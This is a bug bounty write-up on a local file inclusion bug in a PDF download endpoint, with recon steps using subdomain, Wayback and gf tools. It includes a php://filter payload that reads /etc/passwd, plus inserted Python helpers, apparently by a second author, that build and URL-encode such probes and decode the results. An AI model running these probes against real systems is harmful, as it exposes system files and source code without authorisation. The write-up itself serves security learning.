Easy LFI
Easy Local File Inclusion Report
Hello Hackers !!
I'm going to share one of my latest (and fastest) findings.
Let's call the target target.com. They run a bug bounty program with a wildcard scope, *.target.com.
For subdomain enumeration it's a golden tip to use multiple tools to get good coverage; I like to use Subdomainer.
Subdomainer is an automation tool for gathering domains and subdomains, whether for a single target or for multiple targets. It chains several tools to do the subdomain and domain gathering job properly, it can take a list of domains/targets and run the whole operation on them, and when it finishes it saves the results in a comprehensible, ordered way.
A simple usage of Subdomainer:
./subdomainer -t target.com -f true
A lot of things come after subdomain gathering; one of them is collecting all the URLs of the live hosts and filtering them for interesting parameters or endpoints.
So in this step I use waybackurls.
Usage of waybackurls: this is a really good tool for a bug bounty hunter to fetch every URL the Wayback Machine has recorded for each host.
cat all_live.txt | waybackurls
Now that we have all the Wayback URLs, you can grep them for the parameter or endpoint you are interested in, for example:
grep -iE "redirect="
But grepping for every pattern by hand takes a lot of time and effort. To automate this we can use gf,
a wrapper around grep that saves you typing the common patterns:
cat waybackdata | gf lfi | tee -a lfi.txt
After that we can go and check these endpoints manually.
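To show what the grep/gf step is actually doing, here is an added example (my own, not the author's and not gf's code) that walks a constructed list of Wayback URLs and keeps one line per host, path and parameter whose name or value looks like it takes a filename. Wayback returns every historical value of a parameter, so collapsing to host/path/parameter is what turns a huge dump into a short list you can check by hand. The parameter names are my own pick in the spirit of gf's lfi pattern, and the sample URLs are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names that usually carry a filename or path. These are my own
# picks in the spirit of gf's "lfi" pattern file, not a copy of it.
LFI_PARAM_NAMES = {
    "file", "filename", "document", "doc", "folder", "dir", "path", "root",
    "page", "pg", "template", "style", "pdf", "include", "inc", "load",
    "read", "download", "php_path",
}

# Values that already look like a path or a file are interesting even when
# the parameter name is unusual (e.g. ?x=../../etc/passwd or ?x=foo.php).
PATHY_VALUE = re.compile(r"(\.\./|\.(php|pdf|txt|ini|log)$)", re.IGNORECASE)

# Constructed sample of what `cat all_live.txt | waybackurls` might print.
SAMPLE_WAYBACK_URLS = [
    "https://sub1.target.com/download.php?file=report2019.pdf",
    "https://sub1.target.com/download.php?file=report2020.pdf",
    "http://sub1.target.com/download.php?file=old.pdf",
    "https://sub1.target.com/index.php?page=home",
    "https://sub2.target.com/login?redirect=/dashboard",
    "https://sub2.target.com/static/app.js",
    "https://sub3.target.com/view?id=42",
    "https://sub3.target.com/show?x=../../etc/passwd",
    "not a url",
]


def lfi_candidate_params(url):
    """Return the parameter names in `url` that are worth probing for LFI."""
    parts = urlsplit(url)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in LFI_PARAM_NAMES or PATHY_VALUE.search(value):
            hits.append(name)
    return hits


def filter_lfi_candidates(urls):
    """Collapse a Wayback dump to unique host/path/param targets.

    The key drops the scheme and the parameter value, so http/https copies
    and every historical value of ?file= become a single line to test.
    """
    seen = set()
    for url in urls:
        parts = urlsplit(url)
        if not parts.netloc:
            continue  # skip junk lines that are not URLs
        for name in lfi_candidate_params(url):
            seen.add(f"{parts.netloc.lower()}{parts.path}?{name}=")
    return sorted(seen)


if __name__ == "__main__":
    for target in filter_lfi_candidates(SAMPLE_WAYBACK_URLS):
        print(target)
```

Feed it the real waybackurls output line by line and you get the same kind of shortlist gf lfi gives, with the open-redirect and id parameters left out.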
Luckily, I noticed a very promising endpoint, /download.php?file=
and my spidey sense got activated.
After visiting this host I found that this endpoint is for downloading PDF files.
When I tried injecting 1
into this parameter, it downloaded a file containing this error
So clearly this function's job is to look for the requested file, named by this parameter, in that path and try to fetch it.
Without another thought I injected some payloads like these:
But no luck, I got the same error message.
In spite of that, something was telling me to keep digging into this 🧐
Fingerprinting the host showed it was running PHP, so I switched to PHP stream wrapper payloads:
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter lets a pentester include local files with the output base64-encoded, so any base64 output has to be decoded to reveal the contents.
So let's decode this base64 string:
echo "BASE64_STRING" | base64 -d
And we got our /etc/passwd file decoded.
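The php://filter step above, turned into a small helper (an added example, not the author's code): it builds the wrapper payload for any resource and parameter, URL-encodes it for the request, decodes the base64 response the same way the base64 -d command does, and tells the error page apart from a real hit by checking whether the body is valid base64 and whether the decoded text looks like /etc/passwd. The host, endpoint and both sample responses are constructed stand-ins.

```python
import base64
import binascii
import re
from urllib.parse import urlencode

# Constructed stand-in for the file the vulnerable download.php returned:
# the base64 of a small, made-up /etc/passwd.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
SAMPLE_RESPONSE = base64.b64encode(FAKE_PASSWD.encode()).decode()

# Constructed stand-in for the error page the app sent for a bad filename.
SAMPLE_ERROR = "Error: file not found"

# One /etc/passwd record: name:passwd:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^[^:\n]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.MULTILINE
)


def filter_payload(resource, filters=("convert.base64-encode",)):
    """Build a php://filter wrapper that applies `filters` to `resource`.

    filter_payload("/etc/passwd") gives exactly the payload used above;
    filters can be chained, e.g. ("string.rot13", "convert.base64-encode").
    """
    return "php://filter/" + "/".join(filters) + "/resource=" + resource


def probe_url(base_url, param, resource):
    """Full probe URL with the wrapper URL-encoded into `param`."""
    return base_url + "?" + urlencode({param: filter_payload(resource)})


def decode_filter_response(body):
    """Base64-decode a response body, or return None if it is not base64.

    The application's error page is plain text, so it fails validation and
    we do not mistake it for file content.
    """
    blob = re.sub(r"\s+", "", body)
    if not blob or len(blob) % 4:
        return None
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def looks_like_passwd(text):
    """True when the decoded text contains at least one passwd-style record."""
    return bool(text) and bool(PASSWD_LINE.search(text))


if __name__ == "__main__":
    # Assumed endpoint; the real host from the writeup is not given.
    print(probe_url("https://sub1.target.com/download.php", "file", "/etc/passwd"))
    for body in (SAMPLE_RESPONSE, SAMPLE_ERROR):
        decoded = decode_filter_response(body)
        print("hit" if looks_like_passwd(decoded) else "miss", repr(decoded))
```

The same probe_url call with resource="download.php" is the usual way to pull the vulnerable script's own source through the wrapper, which is often the quickest route to finding out why the plain traversal payloads were rejected.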
Although these tools and techniques are few, there is a lot that can be done with them. You can run the same pipeline with other patterns to hunt for:
xss
ssrf
idor
ssti
open redirect
etc.
A great place to find more LFI bypassing tricks:
Thanks for reading!